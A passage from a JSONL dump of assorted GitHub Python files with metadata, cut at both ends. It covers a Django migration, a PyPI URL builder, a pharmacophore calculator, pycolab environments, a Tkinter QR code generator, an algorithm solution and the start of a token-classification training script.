print(f\"\\t{line}\")\n\n with open(section.path, \"w\") as f:\n for line_number, line in enumerate(section.lines):\n if line_number < len(section.lines) - 1:\n f.write(line + \"\\n\")\n else:\n f.write(line)", "repo_name": "UpAllNate/filesectioner", "sub_path": "project_repo/file_class.py", "file_name": "file_class.py", "file_ext": "py", "file_size_in_byte": 11134, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pathlib.Path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 37, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "header.SectionHeader", "line_number": 81, "usage_type": "name"}, {"api_name": "header.SectionHeader", "line_number": 252, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 274, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 295, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 300, "usage_type": "call"}]}
+{"seq_id": "8564140142", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('front', '0005_auto_20150602_2356'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='event',\n name='category',\n field=models.ForeignKey(blank=True, to='front.Category', null=True),\n ),\n ]\n", "repo_name": "bikeanjo/bikeanjo", "sub_path": "front/migrations/0006_event_category.py", "file_name": "0006_event_category.py", "file_ext": "py", "file_size_in_byte": 429, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "34621511168", "text": "\"\"\"Where we build the urls that we'll search in scrapy.\"\"\"\nimport subprocess\n\nimport isort # noqa: F401\nimport snoop\nfrom loguru import logger\nfrom systemd import journal\n\nfmt = \"{time} - {name} - {level} - {message}\"\nlogger.add(\"../logs/info.log\", level=\"INFO\", format=fmt, backtrace=True, diagnose=True) # noqa: E501\nlogger.add(\"../logs/error.log\", level=\"ERROR\", format=fmt, backtrace=True, diagnose=True) # noqa: E501\n\nsubprocess.run([\"isort\", __file__])\n\n\ndef type_watch(source, value):\n return \"type({})\".format(source), type(value)\n\n\nsnoop.install(watch_extras=[type_watch])\n\n\n@logger.catch\n@snoop\ndef build_url_list():\n \"\"\"\n We get the usual structure of pypi site,\n and insert the names in the name list\n where the names usually go in the url.\n \"\"\"\n\n with open(\"/home/mic/python/cli_apps/cli_apps/lists/pypi/only_names.txt\", \"r\") as f:\n names = f.readlines()\n journal.sendv(\"MESSAGE=only_names_list\", \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\")\n for name in names:\n journal.sendv(\"MESSAGE=the name is {}\".format(name), \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\", \"CODE_LINE=34\")\n\n urls = []\n sname = [i for i in names if not (\".\") in i]\n journal.sendv(\"MESSAGE=List sname\", \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\", \"CODE_LINE=39\")\n for name in sname:\n lname = name.lower()\n gname = lname.replace(\"-\", \"_\")\n rname = gname.strip()\n journal.sendv(\"MESSAGE=rname is {}\".format(rname), \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\", \"CODE_LINE=43\")\n url = f\"https://pypi.org/project/{rname}\"\n urls.append(url)\n\n for url in urls:\n journal.sendv(\"MESSAGE=url is {}\".format(url), \"CODE_FILE=build_url_list.py\", \"CODE_FUNC=build_url_list\", \"CODE_LINE=48\")\n with open(\"/home/mic/python/cli_apps/cli_apps/lists/pypi/urls.txt\", \"a\") as f:\n f.write(url)\n f.write(\"\\n\")\n\n\nif __name__ == \"__main__\":\n build_url_list()\n", "repo_name": "miccaldas/old_alternative_projects", "sub_path": "old_cli_apps/build_url_list.py", "file_name": "build_url_list.py", "file_ext": "py", "file_size_in_byte": 2012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "loguru.logger.add", "line_number": 10, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 10, "usage_type": "name"}, {"api_name": "loguru.logger.add", "line_number": 11, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 11, "usage_type": "name"}, {"api_name": "subprocess.run", "line_number": 13, "usage_type": "call"}, {"api_name": "snoop.install", "line_number": 20, "usage_type": "call"}, {"api_name": "systemd.journal.sendv", "line_number": 34, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 34, "usage_type": "name"}, {"api_name": "systemd.journal.sendv", "line_number": 36, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 36, "usage_type": "name"}, {"api_name": "systemd.journal.sendv", "line_number": 40, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 40, "usage_type": "name"}, {"api_name": "systemd.journal.sendv", "line_number": 45, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 45, "usage_type": "name"}, {"api_name": "systemd.journal.sendv", "line_number": 50, "usage_type": "call"}, {"api_name": "systemd.journal", "line_number": 50, "usage_type": 
"name"}, {"api_name": "loguru.logger.catch", "line_number": 23, "usage_type": "attribute"}, {"api_name": "loguru.logger", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "35586605251", "text": "from pmapper.pharmacophore import Pharmacophore as P\nfrom rdkit import Chem\nfrom rdkit import RDConfig\nimport os\nimport pandas as pd\nfrom Bio.SeqUtils import seq3\n\n# Иницилизируем фармакофоры, которые будут использоваться в RDkit, возможно файл BaseFeatures.fdef можно отредактировать, чтобы там были нужные нам фармакофоры, но у меня не получилось\n\nfdefName = os.path.join(RDConfig.RDDataDir,'BaseFeatures.fdef') \nfactory = Chem.ChemicalFeatures.BuildFeatureFactory(fdefName)\n\n# SMILES-представление для аминокислот\naa_smiles = {'ALA': 'O=C(O)[C@H](C)N',\n 'CYS': 'O=C(O)[C@H](CS)N', \n 'ASP': 'O=C(O)[C@H](CC(O)=O)N', \n 'GLU': 'O=C(O)[C@H](CCC(O)=O)N', \n 'PHE': 'O=C(O)[C@H](CC1=CC=CC=C1)N', \n 'GLY': 'O=C(O)CN', \n 'HIS': 'O=C(O)[C@H](CC1=CNC=N1)N', \n 'ILE': 'O=C(O)[C@H]([C@@H](C)CC)N', \n 'LYS': 'O=C(O)[C@H](CCCCN)N', \n 'LEU': 'O=C(O)[C@H](CC(C)C)N', \n 'MET': 'O=C(O)[C@H](CCSC)N', \n 'ASN': 'O=C(O)[C@H](CC(N)=O)N', \n 'PRO': 'O=C(O)[C@H]1NCCC1', \n 'GLN': 'O=C(O)[C@H](CCC(N)=O)N', \n 'ARG': 'O=C(O)[C@H](CCCNC(N)=N)N', \n 'SER': 'O=C(O)[C@H](CO)N', \n 'THR': 'O=C(O)[C@H]([C@H](O)C)N', \n 'VAL': 'O=C(O)[C@H](C(C)C)N', \n 'TRP': 'O=C(O)[C@H](CC1=CNC2=CC=CC=C12)N',\n 'TYR': 'O=C(O)[C@H](CC1=CC=C(C=C1)O)N'}\n\n# Сопоставление pmapper фармакофоров и rdkit фармакофоров\ncompare = {\"A\": \"Acceptor\",\n \"D\": \"Donor\",\n \"P\": \"PosIonizable\",\n \"N\": \"NegIonizable\",\n \"H\": \"Hydrophobe\",\n \"a\": \"Aromatic\"}\n\n# Считаем фармакофоры для всех аминокислот с помощью двух тулов. Сохраняем результаты в 2 датафрейма\n\npharmacophore_RDkit = pd.DataFrame(columns = [aa for aa in aa_smiles], index = [\"Hydrophobe\", \"PosIonizable\", \"NegIonizable\", \"Acceptor\", \"Donor\", \"Aromatic\", \"Sulphur\"])\npharmacophore_RDkit = pharmacophore_RDkit.fillna(0)\npharmacophore_Pmapper = pd.DataFrame(columns = [aa for aa in aa_smiles], index = [\"Hydrophobe\", \"PosIonizable\", \"NegIonizable\", \"Acceptor\", \"Donor\", \"Aromatic\", \"Sulphur\"])\npharmacophore_Pmapper = pharmacophore_Pmapper.fillna(0)\nfor aa in aa_smiles:\n #RDkit\n mol = Chem.MolFromSmiles(aa_smiles[aa])\n mol = Chem.AddHs(mol) \n Chem.AllChem.EmbedMolecule(mol, randomSeed=42)\n feats = factory.GetFeaturesForMol(mol)\n for i in range(len(feats)): \n ph = feats[i].GetFamily()\n if feats[i].GetFamily() == \"LumpedHydrophobe\":\n ph = \"Hydrophobe\"\n pharmacophore_RDkit[aa][ph] += 1\n #Pmapper\n p = P()\n p.load_from_mol(mol)\n pharmacophore_dict = p.get_features_count()\n for i in pharmacophore_dict:\n pharmacophore_Pmapper[aa][compare[i]] += pharmacophore_dict[i]\n if \"S\" in aa_smiles[aa]:\n pharmacophore_RDkit[aa][\"Sulphur\"] += 1\n pharmacophore_Pmapper[aa][\"Sulphur\"] += 1\n \n# Функции для подсчета разницы фармакофоров \ndef get_pharm_diff_RDkit(row):\n wild = seq3(row[\"WILD_TYPE\"]).upper()\n mutant = seq3(row[\"MUTANT\"]).upper()\n return list(pharmacophore_RDkit[mutant] - pharmacophore_RDkit[wild])\ndef get_pharm_diff_Pmapper(row):\n wild = seq3(row['WILD_TYPE']).upper()\n mutant = seq3(row['MUTANT']).upper()\n return list(pharmacophore_Pmapper[mutant] - pharmacophore_Pmapper[wild])\n\n# Загружаем наш датасет с посчитанными CSM после create_CSM.py\nPDB_dataset = pd.read_csv(\"/path/to/dataset_with_CSM.csv\")\n\n# Считаем фармакофоры двумя способами\n\nPDB_dataset[\"pharmacophore_RDkit\"] = PDB_dataset.apply(get_pharm_diff_RDkit, axis=1)\nPDB_dataset[\"pharmacophore_Pmapper\"] = PDB_dataset.apply(get_pharm_diff_Pmapper, axis=1)\n\n#Сохраняем датасет с CSM и 
факрмакофорами\n\nPDB_dataset.to_csv(\"/path/to/folder/dataset_with_CSM_and_PH.csv\")\n", "repo_name": "biocad/CSM", "sub_path": "get_pharmacophore.py", "file_name": "get_pharmacophore.py", "file_ext": "py", "file_size_in_byte": 4258, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rdkit.RDConfig.RDDataDir", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rdkit.RDConfig", "line_number": 10, "usage_type": "name"}, {"api_name": "rdkit.Chem.ChemicalFeatures.BuildFeatureFactory", "line_number": 11, "usage_type": "call"}, {"api_name": "rdkit.Chem.ChemicalFeatures", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rdkit.Chem", "line_number": 11, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 47, "usage_type": "call"}, {"api_name": "rdkit.Chem.MolFromSmiles", "line_number": 51, "usage_type": "call"}, {"api_name": "rdkit.Chem", "line_number": 51, "usage_type": "name"}, {"api_name": "rdkit.Chem.AddHs", "line_number": 52, "usage_type": "call"}, {"api_name": "rdkit.Chem", "line_number": 52, "usage_type": "name"}, {"api_name": "rdkit.Chem.AllChem.EmbedMolecule", "line_number": 53, "usage_type": "call"}, {"api_name": "rdkit.Chem.AllChem", "line_number": 53, "usage_type": "attribute"}, {"api_name": "rdkit.Chem", "line_number": 53, "usage_type": "name"}, {"api_name": "pmapper.pharmacophore.Pharmacophore", "line_number": 61, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.seq3", "line_number": 72, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.seq3", "line_number": 73, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.seq3", "line_number": 76, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.seq3", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 81, "usage_type": "call"}]}
+{"seq_id": "23812329903", "text": "from copy import deepcopy\n\nimport numpy as np\n\nfrom gym import spaces\nfrom pycolab.examples.research.box_world import box_world\nfrom pycolab.examples.classics import cliff_walk\nfrom pycolab import ascii_art\n\nfrom helpers import pycolab_gymify\n\n\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Core.\n\ndef rgbify_dict(color_dict):\n \"\"\"Rescale scalar from [0, 999] interval to [0, 255] \"\"\"\n return {k: tuple([int(c / 999 * 255) for c in list(v)])\n for k, v in color_dict.items()}\n\n\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Create Pycolab environments.\n\nclass BoxWorldEnv(pycolab_gymify.PyColabEnv):\n \"\"\"Box-world environment.\n The environment was first introduced in https://arxiv.org/pdf/1806.01830.pdf,\n for Relational Reinforcement Learning.\n \"\"\"\n\n def __init__(self, default_reward=0.): # task too hard for -1 as default (reward hacking)\n \"\"\"The agent 'only actually move[s] if action is one of the 4 directions of movement'\n (comment found at: pycolab/examples/research/box_world/box_world.py#L166). We could\n ass a fifth action to enable the agent to perform a no-op action, but since only the\n agent move in this environment, there is no use for it. Thus, in accordance to\n the pycolab environment, the action space is defined as `range(4)`.\n (Note, any other action would act as a no-op.)\n\n `max_iterations` is not needed here (but signature is preserved nonetheless) since the\n pycolab environment already set the episode termination horizon with `max_num_steps`.\n\n For grid_size=12 (as pycolab's default), resize_scale=6 gives a render of size 84x84.\n For grid_size=12 (as pycolab's default), resize_scale=16 gives a render of size 224x224.\n \"\"\"\n super(BoxWorldEnv, self).__init__(max_iterations=np.infty,\n default_reward=default_reward,\n action_space=spaces.Discrete(4),\n delay=30,\n resize_scale=16)\n\n def make_game(self):\n \"\"\"Note, those are the settings from the paper.\"\"\"\n return box_world.make_game(grid_size=12,\n solution_length=(1, 2, 3, 4),\n num_forward=(0, 1, 2, 3, 4),\n num_backward=(0,),\n branch_length=1,\n random_state=None,\n max_num_steps=120)\n\n def make_colors(self):\n \"\"\"Return the color dictionary defined in the pycolab environment.\n Note, need to transform it to RGB format for proper rendering.\n \"\"\"\n color_dict = deepcopy(box_world.OBJECT_COLORS)\n return rgbify_dict(color_dict)\n\n\nclass CliffWalkEnv(pycolab_gymify.PyColabEnv):\n \"\"\"Classic cliff-walk game.\"\"\"\n\n def __init__(self, max_iterations, default_reward=-1.):\n super(CliffWalkEnv, self).__init__(max_iterations=max_iterations,\n default_reward=default_reward,\n action_space=spaces.Discrete(4),\n delay=30,\n resize_scale=24)\n\n def make_game(self):\n \"\"\"Reimplemention of the game map.\"\"\"\n # We modify the game art to make the cliff section visual discernible.\n BOOTLEG_GAME_ART = ['......',\n '......',\n 'Pxxxx.']\n return ascii_art.ascii_art_to_game(BOOTLEG_GAME_ART,\n what_lies_beneath='.',\n sprites={'P': cliff_walk.PlayerSprite})\n\n def make_colors(self):\n return {'.': (192, 192, 192),\n 'P': (127, 0, 255),\n 'x': (0, 0, 0)}\n\n\n# >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Create environment maker.\n\ndef make_pycolab(env_id):\n if env_id == 'BoxWorld-v0':\n return BoxWorldEnv()\n elif env_id == 'CliffWalk-v0':\n return CliffWalkEnv(max_iterations=150)\n else:\n pass\n", "repo_name": "lionelblonde/ppo-gail-pytorch", "sub_path": "helpers/pycolab_envs.py", "file_name": "pycolab_envs.py", "file_ext": 
"py", "file_size_in_byte": 4199, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "helpers.pycolab_gymify.PyColabEnv", "line_number": 23, "usage_type": "attribute"}, {"api_name": "helpers.pycolab_gymify", "line_number": 23, "usage_type": "name"}, {"api_name": "numpy.infty", "line_number": 43, "usage_type": "attribute"}, {"api_name": "gym.spaces.Discrete", "line_number": 45, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 45, "usage_type": "name"}, {"api_name": "pycolab.examples.research.box_world.box_world.make_game", "line_number": 51, "usage_type": "call"}, {"api_name": "pycolab.examples.research.box_world.box_world", "line_number": 51, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 63, "usage_type": "call"}, {"api_name": "pycolab.examples.research.box_world.box_world.OBJECT_COLORS", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pycolab.examples.research.box_world.box_world", "line_number": 63, "usage_type": "name"}, {"api_name": "helpers.pycolab_gymify.PyColabEnv", "line_number": 67, "usage_type": "attribute"}, {"api_name": "helpers.pycolab_gymify", "line_number": 67, "usage_type": "name"}, {"api_name": "gym.spaces.Discrete", "line_number": 73, "usage_type": "call"}, {"api_name": "gym.spaces", "line_number": 73, "usage_type": "name"}, {"api_name": "pycolab.ascii_art.ascii_art_to_game", "line_number": 83, "usage_type": "call"}, {"api_name": "pycolab.ascii_art", "line_number": 83, "usage_type": "name"}, {"api_name": "pycolab.examples.classics.cliff_walk.PlayerSprite", "line_number": 85, "usage_type": "attribute"}, {"api_name": "pycolab.examples.classics.cliff_walk", "line_number": 85, "usage_type": "name"}]}
+{"seq_id": "34844813451", "text": "#LIBRARIES USED\nimport qrcode\nfrom tkinter import *\nfrom tkinter import messagebox\n\n#CREATING THE WINDOW\nwn = Tk()\nwn.title('QR CODE GENERATOR')\nwn.geometry('700x700')\nwn.config(bg = 'SteelBlue3')\n\n#FUNCTIONS\ndef generateCode():\n #creating QR\n qr = qrcode.QRCode(version = size.get(),\n box_size=10,\n border=5)\n qr.add_data(text.get())\n qr.make(fit=True)\n img = qr.make_image()\n fileDirec = loc.get()+'\\\\'+name.get()\n img.save(f'{fileDirec}.png')\n messagebox.showinfo(\"QR CODE GENERATED,\",\"QR CODE SAVED SUCCESSFULLY\")\n\n#Labels\nheadingFrame = Frame(wn,bg=\"azure\",bd=5)\nheadingFrame.place(relx=0.15,rely=0.05,relwidth=0.7,relheight=0.1)\nheadingLabel = Label(headingFrame,text=\"GENERATE QR CODE WITH THIS\",bg='azure',font=('Times',20,'bold'))\nheadingLabel.place(relx=0,rely=0,relwidth=1,relheight=1)\n\n#TAKE INPUT IN FORM\nFrame1 = Frame(wn,bg=\"SteelBlue3\")\nFrame1.place(relx=0.1,rely=0.15,relwidth=0.7,relheight=0.3)\n\nlabel1= Label(Frame1,text=\"ENTER TEXT OR URL: \",bg=\"SteelBlue3\",fg='azure',font=('Courier',13,'bold'))\nlabel1.place(relx=0.05,rely=0.2,relheight=0.08)\n\ntext = Entry(Frame1,font=('Century 12'))\ntext.place(relx=0.05,rely=0.4,relwidth=1,relheight=0.2)\n\n#GETTING INPUT OF QR SAVE LOCATION\nFrame2 = Frame(wn,bg=\"SteelBlue3\")\nFrame2.place(relx=0.1,rely=0.35,relwidth=0.7,relheight=0.3)\n\nlabel2 = Label(Frame2,text=\"Enter The Location To Save The QR\",bg=\"SteelBlue3\",fg='azure',font=('Courier',13,'bold'))\nlabel2.place(relx=0.05,rely=0.2,relheight=0.08)\n\nloc = Entry(Frame2,font=('Century 12'))\nloc.place(relx=0.05,rely=0.4,relwidth=1,relheight=0.2)\n\n#GETTING INPUT QR CODE IMAGE NAME\nFrame3 = Frame(wn,bg=\"SteelBlue3\")\nFrame3.place(relx=0.1,rely=0.55,relwidth=0.7,relheight=0.3)\n\nlabel3 = Label(Frame3,text=\"Enter The Name Of The QR CODE\",bg=\"SteelBlue3\",fg='azure',font=('Courier',13,'bold'))\nlabel3.place(relx=0.05,rely=0.2,relheight=0.08)\n\nname = Entry(Frame3,font=('Century 12'))\nname.place(relx=0.05,rely=0.4,relwidth=1,relheight=0.2)\n\n#Getting The Input FOR QR CODE SIZE\nFrame4 = Frame(wn,bg=\"SteelBlue3\")\nFrame4.place(relx=0.1,rely=0.75,relwidth=0.7,relheight=0.2)\n\nlabel4 = Label(Frame4,text=\"Enter The Size From 1 to 40, With 1 being 21x21: \",bg=\"SteelBlue3\",fg='azure',font=('Courier',13,'bold'))\nlabel4.place(relx=0.05,rely=0.2,relheight=0.2)\n\nsize = Entry(Frame4,font=('Century 12'))\nsize.place(relx=0.05,rely=0.4,relwidth=0.5,relheight=0.2)\n\n#Buttons TO GENERATE AND SAVE\nbutton = Button(wn,text=\"Generate CODE\",font=('Courier',15,'normal'),command=generateCode)\nbutton.place(relx=0.35,rely=0.9,relwidth=0.25,relheight=0.05)\n\n#RUNS UNTIL CLOSED MANUALLY\nwn.mainloop()\n\n", "repo_name": "Novelzalsastian/QRCODE_Generator", "sub_path": "QRCODE_READER.py", "file_name": "QRCODE_READER.py", "file_ext": "py", "file_size_in_byte": 2660, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "qrcode.QRCode", "line_number": 15, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 23, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 23, "usage_type": "name"}]}
+{"seq_id": "26109568295", "text": "import os\nimport logging\n\nPARAM_FNAME = 'param.txt'\n\n\ndef read_params(user_dir):\n '''read last used source and dest params.\n\n '''\n params = dict(source='', dest1='', dest2='')\n\n param_file = os.path.join(user_dir, PARAM_FNAME)\n try:\n with open(param_file, 'r') as fout:\n content = fout.read().strip('\\n')\n params['source'], params['dest1'], params['dest2'] = content.split(\n \";\")\n\n # Do not load folders that no longer exist.\n for key, val in params.items():\n if val != '' and not os.path.exists(val):\n params[key] = ''\n\n except Exception as err:\n logging.getLogger(__name__).debug(\n 'Could not read parameters from %s. Error: %s', param_file,\n str(err))\n return params\n\n\ndef dump_params(user_dir, source, dest1, dest2):\n '''write last source and dest params\n\n '''\n delimiter = ';'\n param_file = os.path.join(user_dir, PARAM_FNAME)\n\n logging.getLogger(__name__).debug('Writing user params to %s', param_file)\n try:\n with open(param_file, 'w') as fout:\n fout.write(delimiter.join([source, dest1, dest2]))\n except Exception as err:\n logging.getLogger(__name__).error(\n 'Could not write parameters to %s. Error: %s', param_file,\n str(err))\n", "repo_name": "fmi-basel/faim-robocopy", "sub_path": "faim_robocopy/params.py", "file_name": "params.py", "file_ext": "py", "file_size_in_byte": 1339, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "13201506545", "text": "import sys\nfrom collections import deque\n\nN = int(sys.stdin.readline())\npath = []\nvisited = []\nfor i in range(N):\n temp = list(map(int, sys.stdin.readline().split()))\n path.append(temp[:])\n visited.append(temp[:])\n\ndeq = deque()\ndx = [-1, 0, 0, 1]\ndy = [0, -1, 1, 0]\n\ncur_size = 2\neaten = 0\nans = 0\n\nfor i in range(N):\n for j in range(N):\n if path[i][j] == 9:\n path[i][j] = 0\n deq.append((i, j, 1))\nwhile True:\n food = []\n while len(deq) != 0:\n temp = deq.popleft()\n x, y, cnt = temp[0], temp[1], temp[2]\n if visited[x][y] < 0:\n continue\n visited[x][y] = -cnt\n\n # handle when found\n if 0 < path[x][y] < cur_size:\n food.append((x, y))\n\n for i in range(4):\n nx, ny = x + dx[i], y + dy[i]\n\n if 0 <= nx < N and 0 <= ny < N and path[nx][ny] <= cur_size:\n deq.append((nx, ny, cnt + 1))\n\n ################ end of while ###############\n\n if len(food) == 0:\n break\n shortest = [food[0][0], food[0][1]]\n cur = -visited[food[0][0]][food[0][1]]\n for i in food[1:]:\n x, y = i[0], i[1]\n if -visited[x][y] < cur:\n cur = -visited[x][y]\n elif -visited[x][y] == cur:\n if x < shortest[0]:\n shortest[0] = x\n shortest[1] = y\n elif x == shortest[0] and y < shortest[1]:\n shortest[1] = y\n\n x, y = shortest[0], shortest[1]\n path[x][y] = 0\n deq.clear()\n deq.append((x, y, 1))\n ans += -visited[x][y] - 1\n\n for i in range(N):\n for j in range(N):\n visited[i][j] = 0\n\n eaten += 1\n if cur_size == eaten:\n cur_size += 1\n eaten = 0\n\nprint(ans)", "repo_name": "mushroom1324/Algorithm", "sub_path": "BOJ_16236.py", "file_name": "BOJ_16236.py", "file_ext": "py", "file_size_in_byte": 1743, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.stdin.readline", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.stdin.readline", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 8, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 12, "usage_type": "call"}]}
+{"seq_id": "14544381446", "text": "import json\nimport sys\nimport pandas as pd\nfrom handlers.dataHandler import dataHandler\nfrom datetime import datetime, timedelta\n\n# load config file\ntry:\n with open('config.json') as configFile:\n config = json.load(configFile)\n print(\"Config file loaded\")\nexcept:\n print(\"Failed to load config file\")\n sys.exit(\"Terminating program\")\n\n# Initialize the debug object if debugging is enabled\nif config['debugMode']:\n debugDict = {}\n debugDict['config'] = config\n\n# Initialize and load the data\ndata = dataHandler(config)\ndata.loadData()\n\ndef main(): \n if config['serverMode'] == 'flask':\n count = 0\n import interfaces.flaskInterface as fI \n fI.api.add_resource(fI.BaseTime, '/', \n resource_class_kwargs={'mainConfig': config, 'data': data,\n 'debugDict': debugDict, 'count': count})\n fI.app.run(host=config['flaskHostName'], port=config['flaskPort'])\n if config['serverMode'] == 'bacnet': \n import interfaces.bacnetInterface as bI \n bI.main(data, config)\n \nif __name__ == \"__main__\":\n main()", "repo_name": "jkimmerling/Simulacra", "sub_path": "runner.py", "file_name": "runner.py", "file_ext": "py", "file_size_in_byte": 1138, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 14, "usage_type": "call"}, {"api_name": "handlers.dataHandler.dataHandler", "line_number": 22, "usage_type": "call"}, {"api_name": "interfaces.flaskInterface.api.add_resource", "line_number": 29, "usage_type": "call"}, {"api_name": "interfaces.flaskInterface.api", "line_number": 29, "usage_type": "attribute"}, {"api_name": "interfaces.flaskInterface", "line_number": 29, "usage_type": "name"}, {"api_name": "interfaces.flaskInterface.BaseTime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "interfaces.flaskInterface.app.run", "line_number": 32, "usage_type": "call"}, {"api_name": "interfaces.flaskInterface.app", "line_number": 32, "usage_type": "attribute"}, {"api_name": "interfaces.flaskInterface", "line_number": 32, "usage_type": "name"}, {"api_name": "interfaces.bacnetInterface.main", "line_number": 35, "usage_type": "call"}, {"api_name": "interfaces.bacnetInterface", "line_number": 35, "usage_type": "name"}]}
+{"seq_id": "13663500590", "text": "__author__ = 'haseeb'\nimport os\nfrom PIL import Image as im\nfrom PIL import Image\nfrom matplotlib import pyplot\nimport numpy as np\n\nimages = \"images_list.txt\"\noutput1 = \"resized1.png\"\noutput2 = \"resized2.png\"\n\nw = 512\nh = 512\n\n\ndef resize():\n scaler = Image.ANTIALIAS\n images_list_file = open(images, 'r')\n for image_file in images_list_file:\n image_file = image_file[:-1]\n image = im.open(image_file)\n image_res = image.resize((w,h), scaler)\n image_res.save(output2)\n\nif __name__ == '__main__':\n resize()", "repo_name": "omarelshenawy/SpeechRecognitionCourse", "sub_path": "parse_timit/scripts/resize.py", "file_name": "resize.py", "file_ext": "py", "file_size_in_byte": 546, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PIL.Image.ANTIALIAS", "line_number": 17, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 17, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "27553522719", "text": "import logging\nimport os\nfrom pathlib import Path\nimport sys\nfrom dataclasses import dataclass, field\nfrom typing import List, Optional\nimport json\n\nimport numpy as np\nfrom datasets import load_dataset\nfrom sklearn.metrics import accuracy_score, precision_recall_fscore_support\n\nimport transformers\nfrom transformers import (\n AutoConfig,\n AutoModelForTokenClassification,\n AutoTokenizer,\n DataCollatorForTokenClassification,\n HfArgumentParser,\n PreTrainedTokenizerFast,\n TrainingArguments,\n set_seed,\n)\nfrom transformers.trainer_utils import is_main_process\n\nfrom .trainer import Trainer\nfrom .utils import LABEL_SETS\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass ModelArguments:\n \"\"\"\n Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.\n \"\"\"\n\n model_name_or_path: str = field(\n metadata={\n \"help\":\n \"Path to pretrained model or model identifier from huggingface.co/models\"\n })\n config_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n \"Pretrained config name or path if not the same as model_name\"\n })\n tokenizer_name: Optional[str] = field(\n default=None,\n metadata={\n \"help\":\n 